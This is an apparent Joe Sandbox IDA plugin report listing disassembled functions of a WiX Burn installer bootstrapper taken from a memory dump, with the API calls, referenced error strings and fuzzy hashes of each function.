Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 94168cf43a363fdb5d33f08c68d6ba3380e7c10454cd411e1a3d4aa606d4faab
Instruction ID: 045643b00d7d3fe8c88cb31fad546f3ce6eff8cd0d3421948da24173aed70629
Opcode Fuzzy Hash: 94168cf43a363fdb5d33f08c68d6ba3380e7c10454cd411e1a3d4aa606d4faab
Instruction Fuzzy Hash: F351F371F41315A7DF309E24CD4AFBB7BA8EB95700F10011AF9585A282C276DD50EAF1

Function 000A2A60 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 000A2ACD

Strings

Failed to create the string dictionary., xrefs: 000A2B06
wininet.dll, xrefs: 000A2D1E
crypt32.dll, xrefs: 000A2B18, 000A2C16, 000A2D0B, 000A2D80
Failed to add registration action for dependent related bundle., xrefs: 000A2DD5
Failed to add registration action for self dependent., xrefs: 000A2D9E
Failed to add dependent bundle provider key to ignore dependents., xrefs: 000A2C37
Failed to check for remaining dependents during planning., xrefs: 000A2C73
Failed to add self-dependent to ignore dependents., xrefs: 000A2B51
Failed to add dependents ignored from command-line., xrefs: 000A2B82
Failed to allocate registration action., xrefs: 000A2B36

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: 373cec9a9eb583ef03240b8ecbd88aafdcfcea394c676f798fe32c276eec3d8b
Instruction ID: 4edbb90a4de8b673488e8c4e520340bf3052158bc1504ef202c924137590681d
Opcode Fuzzy Hash: 373cec9a9eb583ef03240b8ecbd88aafdcfcea394c676f798fe32c276eec3d8b
Instruction Fuzzy Hash: D2B19D71A00616EFCF65DFA8C881BAE7BE6BF46350F008179F804AB252D770D950DB91

Function 000949DF Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00094B5E
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00094B6F

Strings

Failed to create the message window., xrefs: 00094A92
Failed to set layout directory variable to value provided from command-line., xrefs: 00094B00
Failed while running , xrefs: 00094B24
Failed to set action variables., xrefs: 00094ABE
Failed to set registration variables., xrefs: 00094AD8
Failed to open log., xrefs: 00094A12
Failed to query registration., xrefs: 00094AA8
WixBundleLayoutDirectory, xrefs: 00094AEF
Failed to check global conditions, xrefs: 00094A43

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 0bdea8aa6c86119382891f606686ddf48be9641d98e84ba6523655e1bd131d8d
Instruction ID: 1391b4658eb3b6d0d395d20c62ec94280df9ef98134391c9afa5432a2ded2f75
Opcode Fuzzy Hash: 0bdea8aa6c86119382891f606686ddf48be9641d98e84ba6523655e1bd131d8d
Instruction Fuzzy Hash: BA41E471A40A1AFADF265A60CC41FFBB6ACFF00750F010216B918A6651EB61ED11E7E1

Function 0009CABE Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,?,000000FF,00095381,?,000952B5,00000000,00095381,FFF9E89D,00095381,000953B5,0009533D,?), ref: 0009CB15

Strings

Failed to ensure directory exists, xrefs: 0009CBE7
Payload was not found in container: %ls, xrefs: 0009CC22
Failed to get directory portion of local file path, xrefs: 0009CBEE
payload.cpp, xrefs: 0009CC16
Failed to extract file., xrefs: 0009CBE0
=S, xrefs: 0009CADC, 0009CBB7
Failed to find embedded payload: %ls, xrefs: 0009CB41
Failed to concat file paths., xrefs: 0009CBF5
=S, xrefs: 0009CC44, 0009CB77
Failed to get next stream., xrefs: 0009CBFC

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: =S$=S$Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1464598962
Opcode ID: 7cb3b87e616e21c605040c7d6b250b7de4c54838c1bb234882ecaf8be185a8d8
Instruction ID: e12b2594ce25b6a6b9cb4329143e0ab27051f727d9a59f0d15ef9e070cba1b0c
Opcode Fuzzy Hash: 7cb3b87e616e21c605040c7d6b250b7de4c54838c1bb234882ecaf8be185a8d8
Instruction Fuzzy Hash: 8641C371D01219EBEF25DF84CD82DAEBBB5AF40710F10816AE915AB352C3719D40FBA1

Function 000AEDFE Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 000AEE1B
LeaveCriticalSection.KERNEL32(?), ref: 000AEF48

Strings

Engine is active, cannot change engine state., xrefs: 000AEE36
UX requested unknown approved exe with id: %ls, xrefs: 000AEE7B
Failed to copy the id., xrefs: 000AEEAD
EngineForApplication.cpp, xrefs: 000AEF29
Failed to copy the arguments., xrefs: 000AEEDA
Failed to post launch approved exe message., xrefs: 000AEF33

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: 5db80a83ce7963801dc799f1d8452f03f435abfd3f90a8f6fa5154a6687265b0
Instruction ID: b767604ec022ae32daf30d3cb2be0b0516acd6f4d5c8b598d69bf4753ccd3411
Opcode Fuzzy Hash: 5db80a83ce7963801dc799f1d8452f03f435abfd3f90a8f6fa5154a6687265b0
Instruction Fuzzy Hash: 6131B036A413A5AFEB21DFB4DC45EAB77A8EF05720B058026FD08EB291D735DD0097A0

Function 000A9496 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,000AA5CE,?,00000000,?,?,000BB041), ref: 000A94B1
GetLastError.KERNEL32(?,000AA5CE,?,00000000,?,?,000BB041,?,00000000,?,00000000,?,?,000BB041,?), ref: 000A94BF
CloseHandle.KERNEL32(?,000BB041,00000001,00000003,000007D0,?,?,000BB041,?), ref: 000A959E

Strings

Failed to copy %ls to %ls, xrefs: 000A958C
%ls container from working path '%ls' to path '%ls', xrefs: 000A9549
Failed to move %ls to %ls, xrefs: 000A9576
Copying, xrefs: 000A9533
Moving, xrefs: 000A9540, 000A9548
Failed to verify container hash: %ls, xrefs: 000A9520
Failed to open container in working path: %ls, xrefs: 000A94EE
cache.cpp, xrefs: 000A94E3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 2528220319-1187406825
Opcode ID: 564d805d07690bf22e5ac6b85a9699bd099c2970f16729d5a70e29c0b203b54a
Instruction ID: 9e94df199c78477cf65d9358b2833e3fdf64ef7cdda1a4ce946b0bf51b341d1f
Opcode Fuzzy Hash: 564d805d07690bf22e5ac6b85a9699bd099c2970f16729d5a70e29c0b203b54a
Instruction Fuzzy Hash: 5A21E671F80764BFE72219BA9C47FAB3658DF52B50F010159FE09BE2C1D2A19D1086F5

Function 00096E5A Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00096E89
LeaveCriticalSection.KERNEL32(?), ref: 00097095

Strings

Failed to read variable name., xrefs: 0009707E
Failed to read variable value as number., xrefs: 0009704F
Failed to read variable included flag., xrefs: 00097085
Failed to read variable literal flag., xrefs: 00097070
Failed to read variable count., xrefs: 00096EA9
Failed to set variable value., xrefs: 00097048
Failed to read variable value as string., xrefs: 00097062
Unsupported variable type., xrefs: 0009705B
Failed to read variable value type., xrefs: 00097077
Failed to set variable., xrefs: 00097069

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-528957463
Opcode ID: 23108124f204bb3706158d6d2f82bf22154ba5d4c8e5eded368116eb046cb7b5
Instruction ID: ef0c0187185c8b170d336d3ab6120f4d923f1d9d6678ef30f0bf7d619cc27e89
Opcode Fuzzy Hash: 23108124f204bb3706158d6d2f82bf22154ba5d4c8e5eded368116eb046cb7b5
Instruction Fuzzy Hash: 7571A072C1521AFBCF21DFA4CC45EEFBBB9FB44750F104122BA04A6151D7329E15ABA1

Function 000D43A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 247fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 000D4425
GetLastError.KERNEL32 ref: 000D443B
GetFileSizeEx.KERNEL32(00000000,?), ref: 000D4486
GetLastError.KERNEL32 ref: 000D4490
CloseHandle.KERNEL32(?), ref: 000D4650

Strings

fileutil.cpp, xrefs: 000D43C6, 000D446F, 000D44B0, 000D4633

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: fileutil.cpp
API String ID: 3555958901-2967768451
Opcode ID: 85041791230f44d52b125fa964dc7271b11f316bc0a1b89b9a2efd31f1a84d8e
Instruction ID: a0c6ce99892fb9681b3e19d958cd5a33467d2413078ff3453fdd189042a6a0b5
Opcode Fuzzy Hash: 85041791230f44d52b125fa964dc7271b11f316bc0a1b89b9a2efd31f1a84d8e
Instruction Fuzzy Hash: DD71CF71A00715ABEF319E699C44BAF76E8EF40760F15412BFD1AEB380D675CE009AB1

Function 000A4B96 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 000A4BC9
StringFromGUID2.OLE32(?,?,00000027), ref: 000A4BF8
UuidCreate.RPCRT4(?), ref: 000A4C43
StringFromGUID2.OLE32(?,?,00000027), ref: 000A4C6F

Strings

Failed to allocate pipe name., xrefs: 000A4C38
Failed to create pipe guid., xrefs: 000A4BD6
Failed to convert pipe guid into string., xrefs: 000A4C15
Failed to allocate pipe secret., xrefs: 000A4C98
BurnPipe.%s, xrefs: 000A4C24
pipe.cpp, xrefs: 000A4C09, 000A4C56

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: 36e7bebb248e7f7cd11993717986f879fba4c4b43f6692e19581110760e8c9cf
Instruction ID: a5e43ed8827edadd8442566182a7b0dd3819cce094e76f7a3f0eac3c8414653e
Opcode Fuzzy Hash: 36e7bebb248e7f7cd11993717986f879fba4c4b43f6692e19581110760e8c9cf
Instruction Fuzzy Hash: 3041B376D01308EBDB60DBE5CD45EDEB7F8AB85710F214126E909FB241D7B49A04CBA0

Function 00095F14 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 105timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00095F3F
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00095F53
GetLastError.KERNEL32 ref: 00095F65
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 00095FB8
GetLastError.KERNEL32 ref: 00095FC2

Strings

variable.cpp, xrefs: 00095F7F, 00095FDC
Failed to get the Date., xrefs: 00095FE6
Failed to get the required buffer length for the Date., xrefs: 00095F89
Failed to allocate the buffer for the Date., xrefs: 00095FA0
Failed to set variant value., xrefs: 00095FFF

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: 1fa7b8f0fcc56c57aacdf93a94b0e0f4128183c6a0d85829ca378184f4d3905a
Instruction ID: 2b4b86e3e76362f9999fcb0a358bf06ce4f625ec7e52cf6481437809f0124b5f
Opcode Fuzzy Hash: 1fa7b8f0fcc56c57aacdf93a94b0e0f4128183c6a0d85829ca378184f4d3905a
Instruction Fuzzy Hash: AC31B772A40716AADF21ABE9CC46FEFB7A8AB44710F010026FB05F7291DA619D04D7B1

Function 000AE82A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 99threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00095386,?,?), ref: 000AE84A
GetLastError.KERNEL32(?,00095386,?,?), ref: 000AE857
CreateThread.KERNEL32(00000000,00000000,000AE563,?,00000000,00000000), ref: 000AE8B0
GetLastError.KERNEL32(?,00095386,?,?), ref: 000AE8BD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00095386,?,?), ref: 000AE8F8
CloseHandle.KERNEL32(00000000,?,00095386,?,?), ref: 000AE917
CloseHandle.KERNEL32(?,?,00095386,?,?), ref: 000AE924

Strings

Failed to create initialization event., xrefs: 000AE882
uithread.cpp, xrefs: 000AE878, 000AE8DE
Failed to create the UI thread., xrefs: 000AE8E8

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 1dd22a7a931d17394a4bf354cbbd58f2b61fb0faf0deb4c5217c3c34ff4cec51
Instruction ID: 086ffb823e1f23f61303e883c31130b56404a63c3619fed0ba6b7251e0ce519b
Opcode Fuzzy Hash: 1dd22a7a931d17394a4bf354cbbd58f2b61fb0faf0deb4c5217c3c34ff4cec51
Instruction Fuzzy Hash: C6314575E01259BFEB109FE9DD84AAFBBE8EF08750F114126FD15F7151D6348E008AA1

Function 000AE3F4 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,00095386,?,?), ref: 000AE415
GetLastError.KERNEL32(?,?,00095386,?,?), ref: 000AE422
CreateThread.KERNEL32(00000000,00000000,000AE177,00000000,00000000,00000000), ref: 000AE481
GetLastError.KERNEL32(?,?,00095386,?,?), ref: 000AE48E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00095386,?,?), ref: 000AE4C9
CloseHandle.KERNEL32(?,?,?,00095386,?,?), ref: 000AE4DD
CloseHandle.KERNEL32(?,?,?,00095386,?,?), ref: 000AE4EA

Strings

splashscreen.cpp, xrefs: 000AE443, 000AE4AF
Failed to create UI thread., xrefs: 000AE4B9
Failed to create modal event., xrefs: 000AE44D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: a31e3d0d5b0a3db58c27901950033b64f204b6cb76e68ef83594aae7608cac59
Instruction ID: 6d94f0a2dc244f1efe2ecfa4d8126e7d14cfb3c62c1dd0eaa85224a05e13a537
Opcode Fuzzy Hash: a31e3d0d5b0a3db58c27901950033b64f204b6cb76e68ef83594aae7608cac59
Instruction Fuzzy Hash: 90317075D01259BFEB109BA9DC05AAFBBF8EB49710F11412AFD14F6250D7344A008AA0

Function 000B1224 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,000952FD,000952B5,00000000,0009533D), ref: 000B1249
GetLastError.KERNEL32 ref: 000B125C
GetExitCodeThread.KERNEL32(000DB478,?), ref: 000B129E
GetLastError.KERNEL32 ref: 000B12AC
ResetEvent.KERNEL32(000DB450), ref: 000B12E7
GetLastError.KERNEL32 ref: 000B12F1

Strings

cabextract.cpp, xrefs: 000B1280, 000B12D0, 000B1315
Failed to reset operation complete event., xrefs: 000B1322
Failed to wait for operation complete event., xrefs: 000B128D
Failed to get extraction thread exit code., xrefs: 000B12DD

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 3b40c8346b5c2faf6a0a9f9b955f0acc338cf91a36d56844996f0ca6b010891a
Instruction ID: f53686bf4ddc5db24c92e0e8672d6be22965dfc42c4d4951764b6c555765c0bc
Opcode Fuzzy Hash: 3b40c8346b5c2faf6a0a9f9b955f0acc338cf91a36d56844996f0ca6b010891a
Instruction Fuzzy Hash: 5421C171700304EFEB149B7A9D56AFEBBE8EF09710F40412FB956E61A0E734DA009A24

Function 0009D5C0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?,000946F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00095386,?,?), ref: 0009D5CD
GetLastError.KERNEL32(?,000946F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00095386,?,?), ref: 0009D5DA
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0009D612
GetLastError.KERNEL32(?,000946F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00095386,?,?), ref: 0009D61E

Strings

wininet.dll, xrefs: 0009D5F8, 0009D63C, 0009D667
Failed to load UX DLL., xrefs: 0009D605
BootstrapperApplicationCreate, xrefs: 0009D60C
Failed to create UX., xrefs: 0009D662
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0009D649
userexperience.cpp, xrefs: 0009D5FB, 0009D63F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
API String ID: 1866314245-1140179540
Opcode ID: 51f5f73665564e35fc6c08ddc87cc42a92ed93f87fabe80e68d882296b6e4295
Instruction ID: 289c8c92459dad57aeb8b9cfa770bdb509f1301efd68394c63b68d67c6d1aa49
Opcode Fuzzy Hash: 51f5f73665564e35fc6c08ddc87cc42a92ed93f87fabe80e68d882296b6e4295
Instruction Fuzzy Hash: 4911C636A81722ABEB215BA99C05F6777D4DF05750F02813BFE0AE7690DB25CC009AF4

Function 000A91F7 Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 223COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 000A9297
GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 000A92BB

Strings

Failed to allocate memory, xrefs: 000A9268
Failed to encode file hash., xrefs: 000A934A
Could not close verify handle., xrefs: 000A944E
0, xrefs: 000A9357
$, xrefs: 000A9396
Failed to allocate string., xrefs: 000A932D
cache.cpp, xrefs: 000A92DB, 000A93F3, 000A9444
Could not verify file %ls., xrefs: 000A9400
Failed to get file hash., xrefs: 000A92E5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast
